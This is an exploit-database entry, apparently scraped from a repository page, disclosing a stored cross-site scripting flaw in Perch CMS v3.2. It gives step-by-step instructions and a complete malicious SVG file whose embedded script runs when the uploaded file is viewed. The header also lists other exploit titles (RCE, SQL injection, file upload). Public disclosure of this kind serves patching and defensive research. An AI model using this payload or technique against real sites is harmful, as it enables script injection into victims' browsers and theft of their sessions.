
3 changes to exploits/shellcodes/ghdb Online Piggery Management System v1.0 - unauthenticated file upload vulnerability Perch v3.2 - Remote Code Execution (RCE) Perch v3.2 - Stored XSS Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi
31 lines
No EOL
894 B
Text
31 lines
No EOL
894 B
Text
Exploit Title: Perch v3.2 - Stored XSS
|
|
Application: Perch Cms
|
|
Version: v3.2
|
|
Bugs: XSS
|
|
Technology: PHP
|
|
Vendor URL: https://grabaperch.com/
|
|
Software Link: https://grabaperch.com/download
|
|
Date of found: 21.07.2023
|
|
Author: Mirabbas Ağalarov
|
|
Tested on: Linux
|
|
|
|
|
|
2. Technical Details & POC
|
|
========================================
|
|
steps:
|
|
1. login to account
|
|
2. go to http://localhost/perch_v3.2/perch/core/settings/
|
|
3. upload svg file
|
|
|
|
"""
|
|
<?xml version="1.0" standalone="no"?>
|
|
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
|
|
|
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
|
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
|
|
<script type="text/javascript">
|
|
alert(document.location);
|
|
</script>
|
|
</svg>
|
|
"""
|
|
4. go to svg file (http://localhost/perch_v3.2/perch/resources/malas.svg) |